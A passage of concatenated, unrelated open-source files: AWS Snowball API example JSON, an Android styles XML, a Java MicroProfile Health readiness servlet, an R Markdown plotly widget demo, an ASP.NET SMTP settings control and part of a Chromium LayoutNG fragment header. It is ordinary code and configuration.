"description": "Returns the UnlockCode code value for the specified job. A particular UnlockCode value can be accessed for up to 90 days after the associated job has been created.\n\nThe UnlockCode value is a 29-character code with 25 alphanumeric characters and 4 hyphens. This code is used to decrypt the manifest file when it is passed along with the manifest to the Snowball through the Snowball client when the client is started for the first time.\n\nAs a best practice, we recommend that you don't save a copy of the UnlockCode in the same location as the manifest file for that job. Saving these separately helps prevent unauthorized parties from gaining access to the Snowball associated with that job.",
"id": "to-get-the-unlock-code-for-a-job-youve-created-for-aws-snowball-1482541987286",
"title": "To get the unlock code for a job you've created for AWS Snowball"
}
],
"GetSnowballUsage": [
{
"input": {
},
"output": {
"SnowballLimit": 1,
"SnowballsInUse": 0
},
"comments": {
},
"description": "Returns information about the Snowball service limit for your account, and also the number of Snowballs your account has in use.\n\nThe default service limit for the number of Snowballs that you can have at one time is 1. If you want to increase your service limit, contact AWS Support.",
"id": "to-see-your-snowball-service-limit-and-the-number-of-snowballs-you-have-in-use-1482863394588",
"title": "To see your Snowball service limit and the number of Snowballs you have in use"
}
],
"ListClusterJobs": [
{
"input": {
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000"
},
"output": {
"JobListEntries": [
{
"CreationDate": "1480475524.0",
"Description": "MyClustrer-node-001",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-002",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440001",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-003",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440002",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-004",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440003",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
},
{
"CreationDate": "1480475525.0",
"Description": "MyClustrer-node-005",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440004",
"JobState": "New",
"JobType": "LOCAL_USE",
"SnowballType": "EDGE"
}
]
},
"comments": {
},
"description": "Returns an array of JobListEntry objects of the specified length. Each JobListEntry object is for a job in the specified cluster and contains a job's state, a job's ID, and other information.",
"id": "to-get-a-list-of-jobs-in-a-cluster-that-youve-created-for-aws-snowball-1482863105773",
"title": "To get a list of jobs in a cluster that you've created for AWS Snowball"
}
],
"ListClusters": [
{
"input": {
},
"output": {
"ClusterListEntries": [
{
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"ClusterState": "Pending",
"CreationDate": "1480475517.0",
"Description": "MyCluster"
}
]
},
"comments": {
},
"description": "Returns an array of ClusterListEntry objects of the specified length. Each ClusterListEntry object contains a cluster's state, a cluster's ID, and other important status information.",
"id": "to-get-a-list-of-clusters-that-youve-created-for-aws-snowball-1482862223003",
"title": "To get a list of clusters that you've created for AWS Snowball"
}
],
"ListJobs": [
{
"input": {
},
"output": {
"JobListEntries": [
{
"CreationDate": "1460678186.0",
"Description": "MyJob",
"IsMaster": false,
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"JobState": "New",
"JobType": "IMPORT",
"SnowballType": "STANDARD"
}
]
},
"comments": {
},
"description": "Returns an array of JobListEntry objects of the specified length. Each JobListEntry object contains a job's state, a job's ID, and a value that indicates whether the job is a job part, in the case of export jobs. Calling this API action in one of the US regions will return jobs from the list of all jobs associated with this account in all US regions.",
"id": "to-get-a-list-of-jobs-that-youve-created-for-aws-snowball-1482542167627",
"title": "To get a list of jobs that you've created for AWS Snowball"
}
],
"UpdateCluster": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"ClusterId": "CID123e4567-e89b-12d3-a456-426655440000",
"Description": "Updated the address to send this to image processing - RJ"
},
"comments": {
},
"description": "This action allows you to update certain parameters for a cluster. Once the cluster changes to a different state, usually within 60 minutes of it being created, this action is no longer available.",
"id": "to-update-a-cluster-1482863900595",
"title": "To update a cluster"
}
],
"UpdateJob": [
{
"input": {
"AddressId": "ADID1234ab12-3eec-4eb3-9be6-9374c10eb51b",
"Description": "Upgraded to Edge, shipped to Finance Dept, and requested faster shipping speed - TS.",
"JobId": "JID123e4567-e89b-12d3-a456-426655440000",
"ShippingOption": "NEXT_DAY",
"SnowballCapacityPreference": "T100"
},
"comments": {
},
"description": "This action allows you to update certain parameters for a job. Once the job changes to a different job state, usually within 60 minutes of the job being created, this action is no longer available.",
"id": "to-update-a-job-1482863556886",
"title": "To update a job"
}
]
}
}
|
{
"pile_set_name": "Github"
}
|
<?xml version="1.0" encoding="utf-8" ?>
<resources>
<style name="MainTheme" parent="MainTheme.Base">
</style>
<!-- Base theme applied no matter what API -->
<style name="MainTheme.Base" parent="Theme.AppCompat.Light.DarkActionBar">
<!-- With support library revision 22.1 or later, use "windowNoTitle" as-is, without the "android:" prefix. -->
<item name="windowNoTitle">true</item>
<!--We will be using the toolbar so no need to show ActionBar-->
<item name="windowActionBar">false</item>
<!-- Set theme colors from http://www.google.com/design/spec/style/color.html#color-color-palette -->
<!-- colorPrimary is used for the default action bar background -->
<item name="colorPrimary">#2196F3</item>
<!-- colorPrimaryDark is used for the status bar -->
<item name="colorPrimaryDark">#1976D2</item>
<!-- colorAccent is used as the default value for colorControlActivated
which is used to tint widgets -->
<item name="colorAccent">#FF4081</item>
<!-- You can also set colorControlNormal, colorControlActivated
colorControlHighlight and colorSwitchThumbNormal. -->
<item name="windowActionModeOverlay">true</item>
<item name="android:datePickerDialogTheme">@style/AppCompatDialogStyle</item>
</style>
<style name="AppCompatDialogStyle" parent="Theme.AppCompat.Light.Dialog">
<item name="colorAccent">#FF4081</item>
</style>
</resources>
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2019 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package com.ibm.ws.microprofile.health20.internal.servlet;
import java.io.IOException;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.osgi.framework.BundleContext;
import org.osgi.framework.ServiceReference;
import com.ibm.websphere.ras.Tr;
import com.ibm.websphere.ras.TraceComponent;
import com.ibm.ws.microprofile.health20.internal.HealthCheck20Service;
import com.ibm.ws.microprofile.health20.internal.HealthCheckConstants;
/**
 * Servlet backing the MicroProfile Health 2.0 readiness endpoint: every
 * request is delegated to the OSGi-registered {@code HealthCheck20Service}
 * with the READY check type.
 */
public class HealthCheckReadinessServlet extends HttpServlet {
    private static final long serialVersionUID = 1L;
    private static final TraceComponent tc = Tr.register(HealthCheckReadinessServlet.class);
    // Lazily resolved OSGi service; populated once by findHealthService().
    private transient HealthCheck20Service healthService = null;
    private final static Logger logger = Logger.getLogger(HealthCheckReadinessServlet.class.getName(), "com.ibm.ws.microprofile.health20.resources.Health20");

    /** {@inheritDoc} */
    @Override
    protected void service(final HttpServletRequest request, final HttpServletResponse response) throws ServletException, IOException {
        findHealthService(request);
        healthService.performHealthCheck(request, response, HealthCheckConstants.HEALTH_CHECK_READY);
    }

    /**
     * Resolves the {@code HealthCheck20Service} from the OSGi service registry
     * on first use and caches it for subsequent requests.
     * (The previous {@code @inheritDoc} tag here was incorrect: this private
     * method overrides nothing and inherits no documentation.)
     *
     * @param request request whose servlet context exposes the OSGi bundle context
     * @throws ServletException if the bundle context or the health check service
     *             is unavailable
     */
    private synchronized void findHealthService(final HttpServletRequest request) throws ServletException {
        if (healthService == null) {
            HttpSession session = request.getSession();
            ServletContext sc = session.getServletContext();
            BundleContext ctxt = (BundleContext) sc.getAttribute("osgi-bundlecontext");
            if (ctxt == null) {
                // Previously this fell through to a NullPointerException when the
                // "osgi-bundlecontext" attribute was missing; fail with the same
                // service-unavailable error as the missing-reference case instead.
                logger.log(Level.SEVERE, "healthcheck.CWMH0000E", "HealthCheckService");
                throw new ServletException(Tr.formatMessage(tc, "OSGI_SERVICE_ERROR", "HealthCheckService"));
            }
            ServiceReference<HealthCheck20Service> ref = ctxt.getServiceReference(HealthCheck20Service.class);
            if (ref == null) {
                logger.log(Level.SEVERE, "healthcheck.CWMH0000E", "HealthCheckService");
                throw new ServletException(Tr.formatMessage(tc, "OSGI_SERVICE_ERROR", "HealthCheckService"));
            } else {
                healthService = ctxt.getService(ref);
            }
        }
    }
}
|
{
"pile_set_name": "Github"
}
|
---
title: "manipulateWidget Demo"
output: html_document
runtime: shiny
---
Hodor. Hodor hodor... Hodor hodor hodor hodor. Hodor, hodor. Hodor. Hodor, hodor, hodor. Hodor hodor?! Hodor, hodor. Hodor. Hodor, hodor - hodor hodor! Hodor, hodor, hodor. Hodor hodor hodor. Hodor. Hodor hodor - hodor... Hodor hodor hodor hodor; hodor hodor? Hodor. Hodor HODOR hodor, hodor hodor... Hodor hodor hodor; hodor hodor?! Hodor hodor - hodor hodor; hodor hodor; hodor hodor? Hodor hodor - hodor hodor... Hodor hodor hodor hodor. Hodor. Hodor hodor HODOR! Hodor HODOR hodor, hodor hodor - hodor hodor! Hodor hodor HODOR! Hodor hodor, hodor. Hodor hodor; hodor hodor; hodor hodor - hodor, hodor, hodor hodor.
```{r, echo = FALSE, message = FALSE}
library(plotly)
library(manipulateWidget)
# Demo data: 100 x positions with standard-normal y values.
mydata <- data.frame(x = 1:100, y = rnorm(100))
# Renders the data either as markers ("points") or as a line whose width is
# taken from `lwd`.
myPlot <- function(type, lwd) {
if (type == "points") {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "markers")
} else {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "lines",
line = list(width = lwd))
}
}
# Interactive widget: a plot-type selector plus a line-width slider that is
# only displayed when "lines" is selected.
manipulateWidget(
myPlot(type, lwd),
type = mwSelect(c("points", "lines"), "points"),
lwd = mwSlider(1, 10, 1, .display = type == "lines"),
.height = 600
)
```
Hodor. Hodor hodor... Hodor hodor hodor hodor. Hodor, hodor. Hodor. Hodor, hodor, hodor. Hodor hodor?! Hodor, hodor. Hodor. Hodor, hodor - hodor hodor! Hodor, hodor, hodor. Hodor hodor hodor. Hodor. Hodor hodor - hodor... Hodor hodor hodor hodor; hodor hodor? Hodor. Hodor HODOR hodor, hodor hodor... Hodor hodor hodor; hodor hodor?! Hodor hodor - hodor hodor; hodor hodor; hodor hodor? Hodor hodor - hodor hodor... Hodor hodor hodor hodor. Hodor. Hodor hodor HODOR! Hodor HODOR hodor, hodor hodor - hodor hodor! Hodor hodor HODOR! Hodor hodor, hodor. Hodor hodor; hodor hodor; hodor hodor - hodor, hodor, hodor hodor.
```{r, echo = FALSE, message = FALSE}
library(plotly)
library(manipulateWidget)
# Same demo as the chunk above, repeated to show a second independent widget
# instance on the page.
mydata <- data.frame(x = 1:100, y = rnorm(100))
# Renders the data either as markers ("points") or as a line whose width is
# taken from `lwd`.
myPlot <- function(type, lwd) {
if (type == "points") {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "markers")
} else {
plot_ly(mydata, x= ~x, y = ~y, type = "scatter", mode = "lines",
line = list(width = lwd))
}
}
# Interactive widget: a plot-type selector plus a line-width slider that is
# only displayed when "lines" is selected.
manipulateWidget(
myPlot(type, lwd),
type = mwSelect(c("points", "lines"), "points"),
lwd = mwSlider(1, 10, 1, .display = type == "lines"),
.height = 600
)
```
|
{
"pile_set_name": "Github"
}
|
<%@ Control Language="C#" AutoEventWireup="true" CodeBehind="SmtpSettings.ascx.cs" Inherits="ASC.Web.Studio.UserControls.Management.SmtpSettings" %>
<%@ Import Namespace="ASC.Core" %>
<%@ Import Namespace="Resources" %>
<div id="smtpSettingsView" class="display-none">
<div class="settings-block">
<div class="header-base clearFix"><%= Resource.SmtpSettings %></div>
<p class="smtp-settings-text"><%: Resource.SmtpSettingsText %> </p>
<div id="currentSettingsBox">
<input id="currentHost" type="hidden" value="<%= CurrentSmtpSettings.Host %>" />
<input id="currentPort" type="hidden" value="<%= CurrentSmtpSettings.Port %>" />
<input id="currentCredentialsUserName" type="hidden" value="<%= CurrentSmtpSettings.CredentialsUserName %>" />
<input id="currentCredentialsUserPassword" type="hidden" value="" />
<input id="currentSenderDisplayName" type="hidden" value="<%= CurrentSmtpSettings.SenderDisplayName %>" />
<input id="currentSenderAddress" type="hidden" value="<%= CurrentSmtpSettings.SenderAddress %>" />
<input id="currentEnableSsl" type="hidden" value="<%= CurrentSmtpSettings.EnableSSL %>" />
<input id="currentEnableAuth" type="hidden" value="<%= CurrentSmtpSettings.EnableAuth %>" />
<input id="currentIsDefault" type="hidden" value="<%= CoreContext.Configuration.SmtpSettings.IsDefaultSettings %>" />
</div>
<div id="settingsSwitch" class="settings-block display-none">
<div id="settingsSwitchHeader"><%= Resource.Source %>:</div>
<div class="clearFix">
<input id="customSettingsRadio" type="radio" name="settingsRadio" value="0" checked="checked">
<label for="customSettingsRadio"><%= Resource.SmtpCustomSettings %></label>
</div>
<div class="clearFix">
<input id="mailserverSettingsRadio" type="radio" name="settingsRadio" value="1">
<label for="mailserverSettingsRadio"><%= Resource.SmtpMailServerSettings %></label>
</div>
</div>
<div id="customSettingsBox" class="smtp-settings-block clearFix"></div>
<script id="customSettingsBoxTmpl" type="text/x-jquery-tmpl">
<div class="smtp-settings-item">
<div class="host requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostName %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ host }" />
</div>
<div class="port requiredField">
<div class="smtp-settings-title headerPanelSmall"><%= Resource.Port %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ port }" />
</div>
</div>
<div class="smtp-settings-item">
<input id="customSettingsAuthenticationRequired" type="checkbox" {{if enableAuth }} checked="checked" {{/if}} />
<label for="customSettingsAuthenticationRequired"><%= Resource.Authentication %></label>
</div>
<div class="smtp-settings-item host-login requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostLogin %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ credentialsUserName }"
{{if !enableAuth }} disabled="disabled" {{/if}}/>
</div>
<div class="smtp-settings-item host-password requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.HostPassword %>:</div>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input autocomplete="off" type="password" class="smtp-settings-field textEdit" value="${ credentialsUserPassword }"
{{if !enableAuth }} disabled="disabled"{{else}} placeholder="**********"{{/if}} />
</div>
<div class="smtp-settings-item display-name">
<div class="smtp-settings-title"><%= Resource.SenderName %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ senderDisplayName }" />
</div>
<div class="smtp-settings-item email-address requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.SenderEmailAddress %>:</div>
<input type="text" class="smtp-settings-field textEdit" value="${ senderAddress }" />
</div>
<div class="smtp-settings-item clearFix enable-ssl">
<input id="customSettingsEnableSsl" type="checkbox" {{if enableSSL }} checked="checked" {{/if}} />
<label for="customSettingsEnableSsl"><%= Resource.EnableSSL %></label>
</div>
</script>
<div id="mailserverSettingsBox" class="smtp-settings-block clearFix"></div>
<script id="mailserverSettingsBoxTmpl" type="text/x-jquery-tmpl">
{{if domains.length}}
<div id="notificationBox">
<div class="smtp-settings-item display-name">
<div class="smtp-settings-title"><%= Resource.SenderName %>:</div>
<input type="text" id="notificationSenderDisplayName" class="smtp-settings-field textEdit" value="${senderDisplayName}">
</div>
<div class="smtp-settings-item email-address requiredField">
<span class="requiredErrorText"><%= Resource.LdapSettingsEmptyField %></span>
<div class="smtp-settings-title headerPanelSmall"><%= Resource.SenderEmailAddress %>:</div>
<input id="notificationLogin" type="text" class="textEdit" value="${login.replace(/@.*/, '')}">
<span id="notificationHostDomainSplitter">@</span>
<select id="notificationDomain" class="comboBox">
{{each domains}}
<option value="${id}" {{if name == $data.login.replace(/.*@/, '')}} selected="selected"{{/if}}>${name}</option>
{{/each}}
</select>
</div>
</div>
{{else}}
<p id="noDomainsMsg">
<%= string.Format(Resource.NoMailServerDomainsMsg.HtmlEncode(), "<a href=\"/addons/mail/#administration\" class=\"link\" target=\"_blank\">", "</a>") %>
</p>
{{/if}}
</script>
<div class="middle-button-container">
<button id="saveSettingsBtn" class="button blue"><%= Resource.SaveButton %></button>
<span class="splitter-buttons"></span>
<button id="saveDefaultCustomSettingsBtn" class="button gray<% if (CurrentSmtpSettings.IsDefaultSettings)
{ %> disable" disabled="disabled<% } %>"><%= Resource.DefaultSettings %></button>
<span class="splitter-buttons"></span>
<button id="sendTestMailBtn" class="button gray <% if (CurrentSmtpSettings.IsDefaultSettings)
{ %> disable" disabled="disabled<% } %>"><%= Resource.SendTestMail %></button>
</div>
</div>
<div class="settings-help-block">
<%= String.Format(Resource.SMTPSettingsHelp.HtmlEncode(), "<br />") %>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
#define THIRD_PARTY_BLINK_RENDERER_CORE_LAYOUT_NG_NG_PHYSICAL_FRAGMENT_H_
#include "base/memory/scoped_refptr.h"
#include "third_party/blink/renderer/core/core_export.h"
#include "third_party/blink/renderer/core/editing/forward.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_offset.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_rect.h"
#include "third_party/blink/renderer/core/layout/geometry/physical_size.h"
#include "third_party/blink/renderer/core/layout/layout_object.h"
#include "third_party/blink/renderer/core/layout/ng/ng_style_variant.h"
#include "third_party/blink/renderer/platform/graphics/touch_action.h"
#include "third_party/blink/renderer/platform/wtf/ref_counted.h"
#include <unicode/ubidi.h>
namespace blink {
class ComputedStyle;
class Node;
class NGFragmentBuilder;
class NGInlineItem;
class PaintLayer;
class NGPhysicalFragment;
// Traits type supplied to RefCounted<NGPhysicalFragment, ...> below: when the
// last reference drops, Destruct() is invoked instead of a plain delete so
// destruction can be routed to the correct fragment subclass.
struct CORE_EXPORT NGPhysicalFragmentTraits {
static void Destruct(const NGPhysicalFragment*);
};
// The NGPhysicalFragment contains the output geometry from layout. The
// fragment stores all of its information in the physical coordinate system for
// use by paint, hit-testing etc.
//
// The fragment keeps a pointer back to the LayoutObject which generated it.
// Once we have transitioned fully to LayoutNG it should be a const pointer
// such that paint/hit-testing/etc don't modify it.
//
// Layout code should only access geometry information through the
// NGFragment wrapper classes which transforms information into the logical
// coordinate system.
class CORE_EXPORT NGPhysicalFragment
    : public RefCounted<const NGPhysicalFragment, NGPhysicalFragmentTraits> {
 public:
  enum NGFragmentType {
    kFragmentBox = 0,
    kFragmentText = 1,
    kFragmentLineBox = 2,
    kFragmentRenderedLegend = 3,
    // When adding new values, make sure the bit size of |type_| is large
    // enough to store.
  };
  enum NGBoxType {
    kNormalBox,
    kInlineBox,
    // A multi-column container creates column boxes as its children, which
    // content is flowed into. https://www.w3.org/TR/css-multicol-1/#column-box
    kColumnBox,
    kAtomicInline,
    kFloating,
    kOutOfFlowPositioned,
    kBlockFlowRoot,
    // When adding new values, make sure the bit size of |sub_type_| is large
    // enough to store.
    // Also, add after kMinimumBlockFormattingContextRoot if the box type is a
    // block formatting context root, or before otherwise. See
    // IsBlockFormattingContextRoot().
    kMinimumBlockFormattingContextRoot = kAtomicInline
  };
  ~NGPhysicalFragment();

  NGFragmentType Type() const { return static_cast<NGFragmentType>(type_); }
  // True for fragment types that may hold child fragments (boxes, line boxes
  // and rendered legends); text fragments are leaves.
  bool IsContainer() const {
    return Type() == NGFragmentType::kFragmentBox ||
           Type() == NGFragmentType::kFragmentLineBox ||
           Type() == NGFragmentType::kFragmentRenderedLegend;
  }
  bool IsBox() const { return Type() == NGFragmentType::kFragmentBox; }
  bool IsText() const { return Type() == NGFragmentType::kFragmentText; }
  bool IsLineBox() const { return Type() == NGFragmentType::kFragmentLineBox; }

  // Return true if this is the legend child of a fieldset that gets special
  // treatment (i.e. placed over the block-start border).
  bool IsRenderedLegend() const {
    return Type() == NGFragmentType::kFragmentRenderedLegend;
  }

  // Returns the box type of this fragment. Only valid for box fragments
  // (DCHECKs IsBox()).
  NGBoxType BoxType() const {
    DCHECK(IsBox());
    return static_cast<NGBoxType>(sub_type_);
  }
  // True if this is an inline box; e.g., <span>. Atomic inlines such as
  // replaced elements or inline block are not included.
  bool IsInlineBox() const {
    return IsBox() && BoxType() == NGBoxType::kInlineBox;
  }
  bool IsColumnBox() const {
    return IsBox() && BoxType() == NGBoxType::kColumnBox;
  }
  // An atomic inline is represented as a kFragmentBox, such as inline block and
  // replaced elements.
  bool IsAtomicInline() const {
    return IsBox() && BoxType() == NGBoxType::kAtomicInline;
  }
  // True if this fragment is in-flow in an inline formatting context.
  bool IsInline() const {
    return IsText() || IsInlineBox() || IsAtomicInline();
  }
  bool IsFloating() const {
    return IsBox() && BoxType() == NGBoxType::kFloating;
  }
  bool IsOutOfFlowPositioned() const {
    return IsBox() && BoxType() == NGBoxType::kOutOfFlowPositioned;
  }
  bool IsFloatingOrOutOfFlowPositioned() const {
    return IsFloating() || IsOutOfFlowPositioned();
  }

  // Return true if this fragment corresponds directly to an entry in the CSS
  // box tree [1]. Note that anonymous blocks also exist in the CSS box
  // tree. Returns false otherwise, i.e. if the fragment is generated by the
  // layout engine to contain fragments from CSS boxes (a line or a generated
  // fragmentainer [2], in other words). The main significance of this is
  // whether we can use the LayoutObject associated with this fragment for all
  // purposes.
  //
  // [1] https://www.w3.org/TR/css-display-3/#box-tree
  // [2] https://www.w3.org/TR/css-break-3/#fragmentation-container
  bool IsCSSBox() const { return !IsLineBox() && !IsColumnBox(); }

  bool IsBlockFlow() const;
  bool IsAnonymousBlock() const {
    return IsCSSBox() && layout_object_->IsAnonymousBlock();
  }
  bool IsListMarker() const {
    return IsCSSBox() && layout_object_->IsLayoutNGListMarker();
  }

  // Return true if this fragment is a container established by a fieldset
  // element. Such a fragment contains an optional rendered legend fragment and
  // an optional fieldset contents wrapper fragment (which holds everything
  // inside the fieldset except the rendered legend).
  bool IsFieldsetContainer() const { return is_fieldset_container_; }

  // Returns whether the fragment is legacy layout root.
  bool IsLegacyLayoutRoot() const { return is_legacy_layout_root_; }

  // True for box types at/after kMinimumBlockFormattingContextRoot (see the
  // NGBoxType ordering contract above), and for legacy layout roots.
  bool IsBlockFormattingContextRoot() const {
    return (IsBox() &&
            BoxType() >= NGBoxType::kMinimumBlockFormattingContextRoot) ||
           IsLegacyLayoutRoot();
  }

  // |Offset()| is reliable only when this fragment was placed by LayoutNG
  // parent. When the parent is not LayoutNG, the parent may move the
  // |LayoutObject| after this fragment was placed. See comments in
  // |LayoutNGBlockFlow::UpdateBlockLayout()| and crbug.com/788590
  bool IsPlacedByLayoutNG() const;

  // The accessors in this class shouldn't be used by layout code directly,
  // instead should be accessed by the NGFragmentBase classes. These accessors
  // exist for paint, hit-testing, etc.

  // Returns the border-box size.
  PhysicalSize Size() const { return size_; }

  // Returns the rect in the local coordinate of this fragment; i.e., offset is
  // (0, 0).
  PhysicalRect LocalRect() const { return {{}, size_}; }

  NGStyleVariant StyleVariant() const {
    return static_cast<NGStyleVariant>(style_variant_);
  }
  bool UsesFirstLineStyle() const {
    return StyleVariant() == NGStyleVariant::kFirstLine;
  }

  // Returns the style for this fragment.
  //
  // For a line box, this returns the style of the containing block. This mostly
  // represents the style for the line box, except 1) |style.Direction()| may be
  // incorrect, use |BaseDirection()| instead, and 2) margin/border/padding,
  // background etc. do not apply to the line box.
  const ComputedStyle& Style() const {
    return layout_object_->EffectiveStyle(StyleVariant());
  }
  const Document& GetDocument() const {
    DCHECK(layout_object_);
    return layout_object_->GetDocument();
  }

  // Returns the associated node, or nullptr for fragments that don't map
  // directly to a CSS box (line boxes, column boxes).
  Node* GetNode() const {
    return IsCSSBox() ? layout_object_->GetNode() : nullptr;
  }
  Node* GeneratingNode() const {
    return IsCSSBox() ? layout_object_->GeneratingNode() : nullptr;
  }
  // The node to return when hit-testing on this fragment. This can be different
  // from GetNode() when this fragment is content of a pseudo node.
  Node* NodeForHitTest() const { return layout_object_->NodeForHitTest(); }

  // Whether there is a PaintLayer associated with the fragment.
  bool HasLayer() const { return IsCSSBox() && layout_object_->HasLayer(); }

  // The PaintLayer associated with the fragment.
  PaintLayer* Layer() const;

  // Whether this object has a self-painting |Layer()|.
  bool HasSelfPaintingLayer() const;

  // True if overflow != 'visible', except for certain boxes that do not allow
  // overflow clip; i.e., AllowOverflowClip() returns false.
  bool HasOverflowClip() const {
    return IsCSSBox() && layout_object_->HasOverflowClip();
  }
  bool ShouldClipOverflow() const {
    return IsCSSBox() && layout_object_->ShouldClipOverflow();
  }

  // This fragment is hidden for paint purpose, but exists for querying layout
  // information. Used for `text-overflow: ellipsis`.
  bool IsHiddenForPaint() const { return is_hidden_for_paint_; }

  // GetLayoutObject should only be used when necessary for compatibility
  // with LegacyLayout.
  //
  // For a line box, |layout_object_| has its containing block but this function
  // returns |nullptr| for the historical reasons. TODO(kojii): We may change
  // this in future. Use |IsLineBox()| instead of testing this is |nullptr|.
  const LayoutObject* GetLayoutObject() const {
    return IsCSSBox() ? layout_object_ : nullptr;
  }
  // TODO(kojii): We should not have mutable version at all, the use of this
  // function should be eliminated over time.
  LayoutObject* GetMutableLayoutObject() const {
    return IsCSSBox() ? layout_object_ : nullptr;
  }

  // |NGPhysicalFragment| may live longer than the corresponding |LayoutObject|.
  // Though |NGPhysicalFragment| is immutable, |layout_object_| is cleared to
  // |nullptr| when it was destroyed to avoid reading destroyed objects.
  bool IsAlive() const { return layout_object_; }
  void LayoutObjectWillBeDestroyed() const {
    // const_cast is needed because fragments are handed out as const; clearing
    // the back-pointer is the one sanctioned mutation (see comment above).
    const_cast<NGPhysicalFragment*>(this)->layout_object_ = nullptr;
  }

  // Returns the latest generation of the post-layout fragment. Returns
  // |nullptr| if |this| is the one.
  //
  // When subtree relayout occurs at the relayout boundary, its containing block
  // may keep the reference to old generations of this fragment. Callers can
  // check if there were newer generations.
  const NGPhysicalFragment* PostLayout() const;

  // Scrollable overflow, including contents, in the local coordinate.
  PhysicalRect ScrollableOverflow() const;

  // ScrollableOverflow(), with transforms applied wrt container if needed.
  // This does not include any offsets from the parent (including relpos).
  PhysicalRect ScrollableOverflowForPropagation(
      const LayoutObject* container) const;

  // The allowed touch action is the union of the effective touch action
  // (from style) and blocking touch event handlers.
  TouchAction EffectiveAllowedTouchAction() const;

  // Returns the bidi level of a text or atomic inline fragment.
  UBiDiLevel BidiLevel() const;

  // Returns the resolved direction of a text or atomic inline fragment. Not to
  // be confused with the CSS 'direction' property.
  TextDirection ResolvedDirection() const;

  // Utility functions for caret painting. Note that carets are painted as part
  // of the containing block's foreground.
  bool ShouldPaintCursorCaret() const;
  bool ShouldPaintDragCaret() const;
  bool ShouldPaintCarets() const {
    return ShouldPaintCursorCaret() || ShouldPaintDragCaret();
  }

  String ToString() const;

  // Debug-build consistency checks; no-ops when DCHECK is off (see the
  // inline definitions at the bottom of this header).
  void CheckType() const;
  void CheckCanUpdateInkOverflow() const;

  // Bit flags selecting what DumpFragmentTree() includes in its output.
  enum DumpFlag {
    DumpHeaderText = 0x1,
    DumpSubtree = 0x2,
    DumpIndentation = 0x4,
    DumpType = 0x8,
    DumpOffset = 0x10,
    DumpSize = 0x20,
    DumpTextOffsets = 0x40,
    DumpSelfPainting = 0x80,
    DumpNodeName = 0x100,
    DumpAll = -1
  };
  typedef int DumpFlags;

  String DumpFragmentTree(DumpFlags,
                          base::Optional<PhysicalOffset> = base::nullopt,
                          unsigned indent = 2) const;

#if DCHECK_IS_ON()
  void ShowFragmentTree() const;
#endif

 protected:
  NGPhysicalFragment(NGFragmentBuilder*,
                     NGFragmentType type,
                     unsigned sub_type);
  NGPhysicalFragment(LayoutObject* layout_object,
                     NGStyleVariant,
                     PhysicalSize size,
                     NGFragmentType type,
                     unsigned sub_type);

  const ComputedStyle& SlowEffectiveStyle() const;
  const Vector<NGInlineItem>& InlineItemsOfContainingBlock() const;

  LayoutObject* layout_object_;
  const PhysicalSize size_;

  const unsigned type_ : 2;  // NGFragmentType
  const unsigned sub_type_ : 3;  // NGBoxType, NGTextType, or NGLineBoxType
  const unsigned style_variant_ : 2;  // NGStyleVariant
  const unsigned is_hidden_for_paint_ : 1;

  // The following bitfields are only to be used by NGPhysicalContainerFragment
  // (it's defined here to save memory, since that class has no bitfields).
  unsigned has_floating_descendants_for_paint_ : 1;
  unsigned has_adjoining_object_descendants_ : 1;
  unsigned has_orthogonal_flow_roots_ : 1;
  unsigned may_have_descendant_above_block_start_ : 1;
  unsigned depends_on_percentage_block_size_ : 1;

  // The following bitfields are only to be used by NGPhysicalLineBoxFragment
  // (it's defined here to save memory, since that class has no bitfields).
  unsigned has_propagated_descendants_ : 1;
